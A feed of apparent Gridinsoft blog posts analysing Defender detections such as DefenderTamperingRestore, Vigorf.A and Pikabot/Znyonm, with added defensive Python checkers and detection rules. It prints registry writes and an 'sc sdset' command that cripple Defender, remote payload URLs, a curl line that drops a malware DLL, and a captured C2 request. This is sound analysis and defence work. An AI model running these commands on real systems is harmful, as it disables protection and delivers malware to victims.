One particular thing that quite a few VirTool:Win32/DefenderTamperingRestore samples do is modify the registry values responsible for real-time and heuristic protection. Malware particularly goes for the “DisableRealtimeMonitoring” value to switch off real-time protection, or sets “DisableBehaviorMonitoring” to stop the tracking of suspicious activity.

Walking Through Affected Registry Keys

Among the main goals of VirTool is disabling Defender completely. Malware creates the “DisableAntiSpyware” value under the key below and sets it to 1, which historically stopped Defender from running. Note that current Defender builds ignore this value (Microsoft discontinued it in the August 2020 platform update), and with Tamper Protection enabled such policy changes are blocked; the write is still a clear tampering indicator.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender

To disable proactive protection, VirTool creates another value, “DisableRealtimeMonitoring”, under the key below and sets it to 1. This stops the continuous scanning of accessed folders and launched files.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection

A less common trick targets reporting to Microsoft’s cloud protection. Setting the DontReportInfectionInformation value to 1 under the following key turns off reporting of infection information to Microsoft.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet
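Here is an added Python check (my own example, not part of the original post) that looks for exactly these policy values. The registry paths are the ones named above; the value list, the function names and the sample snapshot are my own, and the snapshot is constructed rather than taken from a real infection. On Windows it reads the live registry through winreg; elsewhere it evaluates the constructed sample.

```python
"""Flag Defender policy values that DefenderTamperingRestore-style scripts set.
Added example, not code from the Gridinsoft post; paths are the ones quoted there."""
import sys

POLICY_ROOT = r"SOFTWARE\Policies\Microsoft\Windows Defender"

# (subkey relative to POLICY_ROOT, value name, value that indicates tampering, what it switches off)
TAMPER_INDICATORS = [
    ("", "DisableAntiSpyware", 1, "Defender engine (ignored by current builds, still a tamper signal)"),
    ("Real-Time Protection", "DisableRealtimeMonitoring", 1, "real-time protection"),
    ("Real-Time Protection", "DisableBehaviorMonitoring", 1, "behavior monitoring"),
    ("Spynet", "DontReportInfectionInformation", 1, "infection reporting to Microsoft"),
]


def _full_key(rel_key):
    return POLICY_ROOT if not rel_key else POLICY_ROOT + "\\" + rel_key


def assess_defender_policy(snapshot):
    """snapshot: {(relative_subkey, value_name): value} read from HKLM\\...\\Windows Defender.
    Returns human-readable findings; an empty list means no indicator matched."""
    findings = []
    for rel_key, name, bad_value, effect in TAMPER_INDICATORS:
        value = snapshot.get((rel_key, name))
        if value is None:
            continue  # value absent: policy not set, Defender uses its defaults
        if value == bad_value:
            findings.append(f"HKLM\\{_full_key(rel_key)}\\{name} = {value} (disables {effect})")
    return findings


def read_live_snapshot():
    """Read the same values from the live registry; only works on Windows."""
    if not sys.platform.startswith("win"):
        raise OSError("live registry read requires Windows")
    import winreg
    snapshot = {}
    for rel_key, name, _, _ in TAMPER_INDICATORS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, _full_key(rel_key)) as handle:
                snapshot[(rel_key, name)] = winreg.QueryValueEx(handle, name)[0]
        except FileNotFoundError:
            pass  # subkey or value not present: nothing to report
    return snapshot


# Constructed snapshot imitating the three writes described in the post (not a real dump).
SAMPLE_SNAPSHOT = {
    ("", "DisableAntiSpyware"): 1,
    ("Real-Time Protection", "DisableRealtimeMonitoring"): 1,
    ("Spynet", "DontReportInfectionInformation"): 1,
}

if __name__ == "__main__":
    snap = read_live_snapshot() if sys.platform.startswith("win") else SAMPLE_SNAPSHOT
    for line in assess_defender_policy(snap) or ["no tampering indicators set"]:
        print(line)
```

A clean machine normally has none of these values at all, so the absence of a value is treated as a non-finding; a value of 0 is also fine, since that is what an administrator restoring defaults would write.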

Some of the things Microsoft detects under this name go further than registry values and alter the security descriptor of the Defender service itself. The confusing string of letters below is an SDDL descriptor passed to “sc sdset”, which rewrites a service’s DACL and SACL; it has nothing to do with Defender’s exclusion list. Rewriting the descriptor of the Defender service is a known tampering trick, because deny entries can lock even SYSTEM and Administrators out of starting or querying it. In the descriptor shown, the “(D;;WPDT;;;BA)” entry denies the Administrators group the stop (WP) and pause/continue (DT) rights. Note also that the Defender service is registered as WinDefend; the command as captured names WinDefender, which would not match the real service. Several ransomware samples run the same or similar commands while establishing persistence.

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
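Because the descriptor above is hard to read by eye, here is an added Python parser (my example, not from the post) that splits an SDDL string into ACEs, maps the two-letter rights to their service-specific meanings, reports every deny entry, and lists which of the start/stop/pause rights a given trustee is not granted. The descriptor is the one quoted above; the rights and trustee tables follow Microsoft’s SDDL documentation, and the function names are mine.

```python
"""Parse a service SDDL descriptor and point out deny ACEs and missing rights.
Added example for the Gridinsoft post; the sample descriptor is the one quoted there."""
import re

# Two-letter right codes as they apply to services (service-specific access rights).
SERVICE_RIGHTS = {
    "CC": "QueryConfig", "DC": "ChangeConfig", "LC": "QueryStatus", "SW": "EnumerateDependents",
    "RP": "Start", "WP": "Stop", "DT": "PauseContinue", "LO": "Interrogate",
    "CR": "UserDefinedControl", "SD": "Delete", "RC": "ReadControl",
    "WD": "WriteDac", "WO": "WriteOwner",
}
TRUSTEES = {"SY": "SYSTEM", "BA": "Administrators", "BU": "Users", "IU": "Interactive users",
            "SU": "Service logon", "WD": "Everyone"}

# (type;flags;rights;object_guid;inherit_guid;sid)
ACE_RE = re.compile(r"\((?P<type>[A-Z]+);(?P<flags>[A-Z]*);(?P<rights>[A-Za-z0-9]*);"
                    r"(?P<obj>[^;]*);(?P<inh>[^;]*);(?P<sid>[^)]+)\)")

SAMPLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def _rights(field):
    """Split the rights field into two-letter codes; a hex mask is kept verbatim."""
    if field.startswith("0x"):
        return {field}
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def parse_sddl(sddl):
    """Return {'dacl': [...], 'sacl': [...]}, each ACE as {'type', 'rights', 'sid'}."""
    dacl_text, _, sacl_text = sddl.partition("S:")
    dacl_text = dacl_text.split("D:", 1)[1]  # drop any O:/G: owner and group prefix

    def aces(text):
        return [{"type": m["type"], "rights": _rights(m["rights"]), "sid": m["sid"]}
                for m in ACE_RE.finditer(text)]

    return {"dacl": aces(dacl_text), "sacl": aces(sacl_text)}


def find_deny_aces(sddl):
    """(trustee, sorted right names) for every access-denied ACE in the DACL."""
    out = []
    for ace in parse_sddl(sddl)["dacl"]:
        if ace["type"] == "D":
            names = sorted(SERVICE_RIGHTS.get(r, r) for r in ace["rights"])
            out.append((TRUSTEES.get(ace["sid"], ace["sid"]), names))
    return out


def missing_rights(sddl, sid, wanted=("RP", "WP", "DT")):
    """Rights in `wanted` that `sid` is not granted by any allow ACE (deny ACEs aside)."""
    granted = set()
    for ace in parse_sddl(sddl)["dacl"]:
        if ace["type"] == "A" and ace["sid"] == sid:
            granted |= ace["rights"]
    return [SERVICE_RIGHTS[r] for r in wanted if r not in granted]


if __name__ == "__main__":
    for trustee, names in find_deny_aces(SAMPLE_SDDL):
        print(f"DENY {trustee}: {', '.join(names)}")
    for sid in ("SY", "BA"):
        print(f"{TRUSTEES[sid]} not granted: {missing_rights(SAMPLE_SDDL, sid) or 'nothing'}")
```

On a live system the current descriptor comes from “sc sdshow WinDefend”; feeding that output to the parser shows immediately whether an explicit deny on start or query has been planted for SYSTEM or Administrators.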

In rare cases, VirTool acted as a loader, downloading and executing additional malicious modules. It modified the “Shell” and “Userinit” values under the Winlogon key (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon) to execute malicious scripts at system startup. A much more common case, though, is this malicious element being embedded in a more complex script. The latter typically orchestrates the initial malware injection, where disabling Microsoft Defender is a rather obvious preliminary step.

How to Remove VirTool:Win32/DefenderTamperingRestore?

The appearance of VirTool:Win32/DefenderTamperingRestore is usually a bad omen: it is likely a sign of malware activity going on under the radar. In that case, I recommend the following steps:

1. Restart your computer into Safe Mode with Networking

Open the Start menu, then click “Restart” in the power menu while holding the Shift key. In the recovery menu that appears, select “Troubleshoot” → “Advanced options” → “Startup Settings” and click “Restart”. This brings you to the list of startup options.

There, press 5 (or F5) to launch Safe Mode with Networking. This mode keeps non-essential processes and third-party services from starting, leaving you with bare Windows plus network connectivity. That restricts the malware from running and makes removal much easier.

2. Run reliable antivirus software

Download a reliable antivirus program that can remove VirTool remnants permanently from your PC. GridinSoft Anti-Malware is an excellent option for this. Run a Full Scan and remove any detected threats. Afterwards, check in Windows Security that Defender’s real-time protection is back on and that Tamper Protection is enabled, so the same script cannot switch it off again.


PUA:Win32/Vigua.A
https://gridinsoft.com/blogs/pua-win32-vigua-a-detection/
Wed, 20 Mar 2024 20:48:39 +0000

The post PUA:Win32/Vigua.A appeared first on Gridinsoft Blog.

PUA:Win32/Vigua.A is a generic detection name used by Microsoft Defender for potentially unwanted applications (PUAs). It is most often associated with various system optimizers that have hidden functionality beyond their stated functions.

PUA:Win32/Vigua.A Overview

PUA:Win32/Vigua.A is a generic detection associated with unwanted software positioned as a system optimizer. Usually it falls under the definition of scareware: an app that “finds” many issues in the system and requires purchasing the full version to fix them. Alternatively, such apps offer to fine-tune the system “to get better performance”, asking payment for useless or dangerous functionality.

[Image: PUA:Win32/Vigua.A detection by Microsoft Defender]

Despite the polished interface and convincing messages, the effectiveness of such software is very questionable. Often, all these “issues” or “improvements” do not exist, and the whole show is there to push the user into buying the full version of the program. Moreover, such applications can sometimes harm the system or even cause a BSoD. And this is not the only harm that Vigua can do.

I’ve performed my own analysis of several samples of unwanted programs that Microsoft detects as Vigua.A. The findings are, well, disturbing, but not particularly new. Let’s get into things one by one.

Vigua.A Analysis

The unwanted software that falls under this detection name is rather similar, so the characteristics below apply more or less to the majority of Vigua.A samples out there. Note that a couple of the samples I picked for this analysis belong to no-name tools that barely have any online footprint.

Spreading

Although some PUAs have “official websites”, users almost always get them unwillingly. Vigua.A often arrives as “recommended software” bundled with freeware or pirated programs. This alone is enough to call it unwanted software, as security vendors have long considered this distribution method dangerous. Yet digging further uncovers even more interesting details.

Fake Issues and System Tuning

As I said above, PUA:Win32/Vigua.A merely mimics work without taking any real action. Before making changes to the system, legitimate system optimizers usually let you see each action and decide whether to perform it. Vigua shows only the number of errors found, without details, and offers to fix them in one click. It is impossible to find out what is going on “under the bonnet” of the program, as the source code is closed and the course of action is unclear.

[Image: The interface of a “system fixing utility” that got the PUA:Win32/Vigua.A detection]

Another type of PUA under this detection name is pseudo system optimizers. They promise to “improve” the user experience by removing alleged bloatware and disabling functionality that is not needed. The issue is that both samples of this category I tested did not say what exactly they change, same as the scareware above.

[Image: Fake system optimization utility]

And here is the main issue: when the program disables whatever it deems unnecessary, chances are it will disable something you actually need. This eventually leads to a selection of really unpleasant consequences, both for your user experience and for overall system stability. Once again, quite a few Vigua.A samples are not even publicly available; they are no-name software with no one responsible for possible issues.

Browser Data Collection & Exfiltration

Now, let’s discuss the part of PUA:Win32/Vigua.A that worries me more than the futile functionality or the lack of control over the changes. According to my analysis, PUA:Win32/Vigua.A collects information about the user’s network activity: browser activity, history, requests, etc. On top of that, the unwanted programs collected basic system info, probably to fingerprint the system.

List of data collected by Vigua.A

  • OS version
  • Username
  • CPU/GPU
  • Display resolution
  • Installed programs
  • Browser activity hours
  • Default search engine
  • Search queries
  • IP addresses of the device
  • Browser configurations

Such information is still not comparable to what information-stealing malware collects. Nonetheless, sharing data with untrustworthy software vendors is a bad idea. It is hard to predict how they will use it, but most probably it ends up sold to an advertising network. Sure, these networks collect info about us anyway, but at least we consent to it, which is barely the case with Vigua.

Is PUA:Win32/Vigua.A False Positive?

In some cases PUA:Win32/Vigua.A can be a false positive. This is due to the programs’ behavior, particularly their ability to change low-level system settings. For example, Microsoft Defender can falsely detect legitimate miners such as NiceHash. Another category of software that sometimes receives this detection as a false positive is torrent clients, in particular qBittorrent and Transmission, both open-source and safe.

Overall, programs that manage hardware settings or access hardware directly and are not signed with a valid code-signing certificate can easily get the Vigua detection. If you have something that fits this description, don’t rush to delete it. Double-check with our free Online Virus Scanner tool; it will give you a much-needed second opinion.

How to Remove PUA:Win32/Vigua.A?

To remove unwanted software like PUA:Win32/Vigua.A, I’d recommend GridinSoft Anti-Malware. Although the Vigua detection is not a sign of severe malware running, I would not hesitate to remove it. As it often arrives in a software bundle, there is a good chance that other unwanted software is present on your computer. Run a Standard scan and let it finish: this will remove any questionable element in the system.


Trojan:Win32/Vigorf.A
https://gridinsoft.com/blogs/trojanwin32-vigorf-a-analysis-removal/
Mon, 18 Mar 2024 21:53:27 +0000

The post Trojan:Win32/Vigorf.A appeared first on Gridinsoft Blog.

Trojan:Win32/Vigorf.A is a generic detection of Microsoft Defender. This detection commonly identifies running loader malware that can do significant harm to the system. In this article, let’s find out how dangerous Vigorf.A is and how to get rid of it.

What is Trojan:Win32/Vigorf.A?

Trojan:Win32/Vigorf.A is the detection name that Microsoft Defender attributes to dropper/loader malware. This generic detection name covers a whole range of malicious programs rather than one specific family. The goal of Vigorf.A is unauthorized system access and further malware delivery. As my analysis has shown, Trojan:Win32/Vigorf.A uses various methods to bypass antivirus programs and operating system protection.

[Image: Trojan:Win32/Vigorf.A detection]

Usually this malware downloads or installs other malicious programs on the computer. It drops its files and modifies system settings and configuration files to gain persistence. Additionally, it connects to remote servers to send collected information and download additional malicious programs.

Is Trojan:Win32/Vigorf.A False Positive?

False positives with the Vigorf.A name are not common. There are only a few cases discussed online, and all of them concern software that borders on malicious.

[Image: User complaints about false positive detection]

The most common case here is game modifiers or patches. Such tools modify game memory or files to unlock features and can be misidentified as Trojan:Win32/Vigorf.A because they intrude into other programs’ memory. Similar tools and scripts used by software developers can also be misidentified as malicious. While potentially safe and legitimate, such software should be treated with care.

Vigorf.A Trojan Analysis

Studying the behavior of a Trojan:Win32/Vigorf.A sample on an infected system showed me how elaborate these threats can be. Not only does the Trojan collect personal user data, it also modifies system settings, creating additional weaknesses and opening the door for other malware.

Methods of Distribution

Trojan:Win32/Vigorf.A is often spread via spam email campaigns with malicious attachments or links. Once the user opens the attachment or clicks the link, the Trojan is installed on their computer, either directly or through a loader script. Despite being used for malware spreading for years, email spam remains a particularly potent and effective distribution channel.

[Image: Example of a spam email]

Malvertising is another tricky method that has been used to spread Trojan:Win32/Vigorf.A, as far as my research goes. The operators abuse ad networks to place malicious ads in search engine results. Such ads redirect users to malicious look-alikes of familiar sites or directly download malware onto their devices.

[Image: Fake LibreOffice ad that tries to mimic the original site’s URL]

In addition, Vigorf.A is often hidden in packages containing illegal or pirated software. When you download and install such programs, the trojan is installed along with them. Such software is offered for free, which makes it attractive, but it ends up costing more because of the damage the trojan causes.

Launch, Gaining Persistence and Data Collection

After launching in the system, Trojan:Win32/Vigorf.A adds itself to autorun through the Startup folder, so it starts automatically every time the system boots. In my case, I found a strange shortcut, adxjcv4.lnk, which turned out to be associated with the trojan.

%APPDATA%\microsoft\windows\start menu\programs\startup\_adxjcv4_.lnk

Alternatively, Vigorf.A may use DLL hijacking. This happens particularly often when the malware arrives with a loader that unpacks the sample and handles the launch. The launch itself is nothing unusual: a PowerShell command that runs the malware DLL through a call to rundll32.exe. Note that advpack.dll in the captured command line is a legitimate Windows library, well known as a living-off-the-land binary for running INF sections; the export name and arguments are not shown in the captured command line.

rundll32.exe %windir%\system32\advpack.dll

After the launch, the malware checks the system location by its IP address and switches to collecting system data. This gives Vigorf.A the ability to distinguish that particular system from others; it can also be used for more targeted attacks or to get a rather exhaustive set of victim system info to analyze. The malware particularly reads the following keys to learn which programs are present and used on the PC (UserAssist stores ROT13-encoded names of executed programs and opened shortcuts, together with run counts and last-run timestamps):

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count
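As an added example (mine, not the post’s), the following Python code shows what the malware can learn from those two keys. UserAssist value names are ROT13-encoded program paths, and on Windows 7 and later each Count entry is a 72-byte record with the run count at offset 4 and the last-run FILETIME at offset 60; the same parser is what a forensic analyst uses to reconstruct program execution history. The entries below are constructed for the example, not exported from an infected system, and the function names are my own.

```python
"""Decode UserAssist Count entries: what a Vigorf.A-style stealer learns from them.
Added example for the Gridinsoft post; sample entries are constructed, not real exports."""
import codecs
import struct
from datetime import datetime, timedelta, timezone

# The two UserAssist subkeys named in the post: executed programs and opened shortcuts.
USERASSIST_EXE = "{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}"
USERASSIST_LNK = "{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}"
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def decode_name(value_name):
    """UserAssist value names are ROT13-obfuscated paths (GUIDs and digits are unaffected)."""
    return codecs.decode(value_name, "rot_13")


def decode_count_value(blob):
    """Parse the 72-byte Windows 7+ Count record: run count at offset 4, FILETIME at 60."""
    if len(blob) < 68:
        raise ValueError("entry too short for the Windows 7+ layout")
    run_count = struct.unpack_from("<I", blob, 4)[0]
    filetime = struct.unpack_from("<Q", blob, 60)[0]
    last_run = None
    if filetime:  # zero means the entry was never run (or timestamp not recorded)
        last_run = FILETIME_EPOCH + timedelta(microseconds=filetime // 10)
    return {"run_count": run_count, "last_run": last_run}


def program_inventory(entries):
    """entries: {value_name: data bytes} from one UserAssist Count subkey.
    Returns [(decoded path, run_count, last_run)] sorted by most recently run first."""
    rows = []
    for name, data in entries.items():
        parsed = decode_count_value(data)
        rows.append((decode_name(name), parsed["run_count"], parsed["last_run"]))
    rows.sort(key=lambda r: r[2] or FILETIME_EPOCH, reverse=True)
    return rows


def _make_entry(run_count, when):
    """Build a constructed 72-byte record for the sample below (test data, not a real export)."""
    blob = bytearray(72)
    struct.pack_into("<I", blob, 4, run_count)
    filetime = int((when - FILETIME_EPOCH).total_seconds()) * 10_000_000
    struct.pack_into("<Q", blob, 60, filetime)
    return bytes(blob)


# Constructed sample of what a stealer would find under the executable-count subkey.
SAMPLE_ENTRIES = {
    codecs.encode(r"C:\Program Files\Mozilla Firefox\firefox.exe", "rot_13"):
        _make_entry(42, datetime(2024, 3, 18, 9, 30, tzinfo=timezone.utc)),
    r"P:\Hfref\ivpgvz\Qrfxgbc\frghc.rkr":  # ROT13 of C:\Users\victim\Desktop\setup.exe
        _make_entry(1, datetime(2024, 3, 17, 21, 5, tzinfo=timezone.utc)),
}

if __name__ == "__main__":
    for path, count, last in program_inventory(SAMPLE_ENTRIES):
        print(f"{count:>4}x  {last.isoformat() if last else 'never':25}  {path}")
```

On a live Windows box the same dictionary can be filled with winreg by enumerating the values under each Count subkey; the decoder does not change. Seeing the real data makes it clear why the post calls this a fingerprint: a list of every program the user has launched, with counts and timestamps, identifies a machine far better than its OS version.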

By reading the next keys, Trojan:Win32/Vigorf.A learns about the networks the computer connects to and can identify the most promising points for further attacks. This information helps the malware operators deploy malware more selectively and extract extra profit from systems attached to a corporate network.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache\Intranet

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect

C2 Communications and Malware Delivery

After collecting all this data, Vigorf encrypts it and sends it to the command server in an HTTP POST request. The list of command servers was hard-coded in the samples I worked with, but this may differ in other cases. The server in turn responds with a blob of data that instructs the malware on further actions. For dropper malware, payload delivery is obviously one of the most probable instructions.

To instruct the dropper to deliver malware, the C2 sends the URLs Vigorf should download it from. The dropper then sends HTTP GET requests to the following URLs:

http[:]//185.117.75.198/fiscal/1
http[:]//194.163.43.166/08/st/m.zip

Files downloaded from these addresses were disguised as ordinary documents or incomplete files, making them harder to detect and analyze. Once Vigorf finishes downloading the payload, it launches it through system utilities such as wuapp.exe:

"C:\Windows\System32\wuapp.exe" -c "C:\ProgramData\sHrhJDaCBu\cfg"

How to Remove Trojan:Win32/Vigorf.A?

To remove Trojan:Win32/Vigorf.A, I recommend GridinSoft Anti-Malware. It will detect and remove Vigorf.A and find the other malicious programs downloaded by it. It can also work alongside Windows Defender as an additional line of defense.


It is important to run a Full Scan and remove all detected threats. I also recommend keeping the system and all programs updated to the latest versions to close the vulnerabilities malware can exploit.

Trojan:Win32/Znyonm
https://gridinsoft.com/blogs/trojanwin32-znyonm-detection/
Fri, 15 Mar 2024 08:52:36 +0000

The post Trojan:Win32/Znyonm appeared first on Gridinsoft Blog.

Trojan:Win32/Znyonm is a detection that often appears during backdoor malware activity in the background. Such malware can escalate privileges, enable remote access, or deploy more payloads. Let’s dive into this malicious program, understand how it works, and see how to remove it.

Trojan:Win32/Znyonm Detection Overview

Trojan:Win32/Znyonm is a detection associated with backdoor malware, usually one that uses heavy obfuscation and anti-analysis techniques. In particular, this detection name appears with malware like GuLoader, Remcos RAT, and Pikabot. Others can be seen too, as Microsoft attaches this name to a set of properties rather than to specific malware families.

[Image: Trojan:Win32/Znyonm detection]

The primary objectives of Znyonm are facilitating remote access and deploying additional payloads. As a preliminary stage, it establishes persistence, escalates privileges, and communicates with command-and-control (C2) servers. Among the samples found on VirusTotal, I’ve seen multi-stage loading of code fragments from remote servers via .LNK, VBS, and PowerShell scripts. This lets it slip past antivirus detection and deliver any malicious payload to the victim’s computer.

Znyonm Trojan Analysis

For the Znyonm sample to analyze, I picked one of the fresh Pikabot samples. Pikabot is a modular backdoor that emerged in early 2023 and gained prominence as a substitute for the infamous QakBot. It serves as an initial access tool in high-profile cyberattacks; its primary tactics for initial access are spear phishing and thread hijacking. Once in, Pikabot deploys exploit kits, ransomware, or other malware tools.

Spreading ways

Znyonm/Pikabot gains initial access through spear phishing. It targets users with convincing emails that look like routine workflow messages; the fraudsters particularly employ thread hijacking to make them look genuine. The attachment format varies, from a PDF document to a ZIP archive containing the payload. In either case, the email text tries to convince the user to open the attachment and follow its instructions.

[Image: Typical example of a message that spreads Pikabot. Source: ANY.RUN]

Another method is malvertising via major ad platforms like Google or Facebook. The attackers trick users into downloading and installing malware by using the names of popular free software, drivers, and tools. The sites used in these campaigns live for an extremely short time but can infect hundreds of users.

Unpacking, Launch & Persistence

Upon execution, Znyonm runs a set of checks to avoid analysis, among them a call to NtQueryInformationProcess (the classic way to detect an attached debugger). Then it decrypts the DLL and performs another round of anti-analysis and anti-debug tricks. After passing them, the malware assembles its core from encrypted parts of the DLL it arrived in. To run that core inside a legitimate-looking process, Pikabot/Znyonm performs process hollowing.

"C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
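Both the Vigorf.A launch through rundll32 and advpack.dll described earlier and the Pikabot drop command above leave distinctive process-creation command lines. As an added example (my code, not the post’s or the malware’s), here are simple detection rules run over constructed command lines modelled on those commands; the rule names, the sample lines (including the example.invalid URL) and the list of INF-launching DLLs, taken from the LOLBAS project, are my own choices.

```python
"""Process-creation rules for the rundll32 and curl-drop patterns shown in the posts.
Added example; the sample command lines are constructed, not real telemetry."""
import re

# Constructed process-creation command lines, modelled on the commands quoted above.
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://example.invalid/0.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll',
    r'rundll32.exe C:\Windows\system32\advpack.dll,LaunchINFSection C:\Users\victim\AppData\Local\Temp\x.inf,DefaultInstall',
    r'rundll32.exe C:\Users\victim\AppData\Roaming\adx\payload.dll,Start',
    r'"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://example.invalid/',
]

DOWNLOADERS = ("curl", "curl.exe", "certutil", "certutil.exe", "bitsadmin", "bitsadmin.exe")
# System DLLs that rundll32 can use to run an INF section (LOLBAS-listed technique).
INF_LAUNCH_DLLS = ("advpack.dll", "ieadvpack.dll", "setupapi.dll", "syssetup.dll")
SYSTEM_PREFIXES = ("c:\\windows\\", "%windir%", "%systemroot%")


def _tokens(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted paths intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(cmdline):
    """Return the rule names that match one command line (empty list = nothing suspicious)."""
    hits = []
    lower = [t.lower() for t in _tokens(cmdline)]
    image = lower[0].rsplit("\\", 1)[-1] if lower else ""
    uses_downloader = any(t in DOWNLOADERS for t in lower)
    # Rule 1: a command-line downloader writing a .dll to disk (curl --output x.dll etc.)
    if uses_downloader and any(t.endswith(".dll") for t in lower):
        hits.append("downloader_writes_dll")
    # Rule 2: cmd.exe chaining mkdir with a downloader, as in the Pikabot drop command
    if image == "cmd.exe" and "mkdir" in lower and uses_downloader:
        hits.append("cmd_mkdir_then_download")
    if image == "rundll32.exe" and len(lower) > 1:
        dll = lower[1].split(",", 1)[0]
        # Rule 3: rundll32 loading a DLL from outside the Windows directory
        if not dll.startswith(SYSTEM_PREFIXES):
            hits.append("rundll32_user_path_dll")
        # Rule 4: rundll32 with an INF-launching system DLL (advpack.dll and friends)
        if dll.rsplit("\\", 1)[-1] in INF_LAUNCH_DLLS:
            hits.append("rundll32_inf_launch_dll")
    return hits


def scan(lines):
    """Map each command line to its rule hits, omitting lines that match nothing."""
    result = {}
    for line in lines:
        hits = classify(line)
        if hits:
            result[line] = hits
    return result


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_COMMAND_LINES).items():
        print(", ".join(hits), "<-", line)
```

Rule 4 is the noisiest of the four, because setup programs legitimately use advpack.dll; in practice it is worth keeping only with the parent process and the INF path taken into account, which is why the rule reports the DLL rather than blocking on it.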

Pikabot resolves the first three API addresses it needs by hash rather than by name, then switches to dynamic API resolution to evade EDR/XDR hooks. The malware checks the system language before gathering system information and stops executing if the language is on its ban list. After passing the check, it collects system properties to fingerprint the system.

[Image: Pikabot code snippet; the system language check]

The fingerprint includes the user name, computer name, display information, CPU information, physical and virtual memory, domain controller name, operating system version, and a snapshot of its own process. This is a typical set of data for backdoor malware, meant to distinguish one system from another. Some backdoors, though, have gained the ability to collect more data over time, getting closer to spyware in functionality.

C2 Communication

The malware sends the collected data to the command server in an HTTP POST request over TLS. On first contact, the server responds with a command and configuration info: a command-specific code, a URL, a file path, and the action the malware should execute. Some commands also require Pikabot to send results back to the C2. In the request captured below, note that the host in the request line does not match the Host header, and that the User-Agent imitates Office 2010 on Windows 7.

POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2

How to Remove Trojan:Win32/Znyonm?

If you receive a notification about a Trojan:Win32/Znyonm detection, an anti-malware scan is needed. As you can see from the analysis above, Znyonm is nothing to mess around with, and it can lead to more serious and diverse malware infections. Gridinsoft Anti-Malware will fit perfectly for malware removal. Launch a Full scan and let it finish – it will take care of every dangerous thing present in your system.


]]>
https://gridinsoft.com/blogs/trojanwin32-znyonm-detection/feed/ 0 20390
Win32/Wacapew.C!ml Detection Analysis & Recommendations https://gridinsoft.com/blogs/win32-wacapew-cml-detection-analysis/ https://gridinsoft.com/blogs/win32-wacapew-cml-detection-analysis/#respond Wed, 13 Mar 2024 09:28:19 +0000 https://gridinsoft.com/blogs/?p=20330


]]>
Win32/Wacapew.C!ml detection refers to programs that have suspicious properties. This can be either a false positive or a detection of a program whose properties and functions border on those of a PUA. Let’s look into this and find out what this detection is.

What is Win32/Wacapew.C!ml?

Program:Win32/Wacapew.C!ml is a heuristic detection designed to detect a suspicious program. However, it is not a specific virus or malware. Microsoft Defender uses this type of detection to identify a wide range of questionable applications. All programs detected with this name typically exhibit suspicious properties. These include the ability to read and modify specific file properties, download data from remote servers, and rename themselves, which may indicate malicious behavior.

Screenshot: Win32/Wacapew.C!ml detection

While these functions alone are barely enough to be sure about the program’s intentions, in situations where other detection systems can neither confirm nor rule out the detection, Defender is obligated to show the Wacapew.C!ml detection. It is more like “I don’t like this program” than “It is malicious”.

Among the typical examples of software detected as Wacapew are self-made applications or sketchy applets found on the Web. For instance, Microsoft Defender may flag a Python script converted into an EXE file as Wacapew because it requests admin privileges. Malware creators commonly use this conversion process, hence the suspicion.

Is It a False Positive?

Since a detection name ending in “ml” means an AI-based detection system was used, there is a possibility of it being a false positive. This compounds the blurry definition behind the Wacapew detection. Normally, other detection systems would reject or confirm the detection, leading to a different detection name or no detection at all. That, however, is not how it works in this case.

Screenshot: !ml detection false positive

If Microsoft Defender detects a legitimate program with this name, you can be sure that you’re dealing with a false positive detection. But if you are not sure about the affected file’s origin and authenticity, consider scanning it with our Free Online Virus Scanner. It will analyze the file using its own detection systems and give you a verdict on whether the file is dangerous or not.

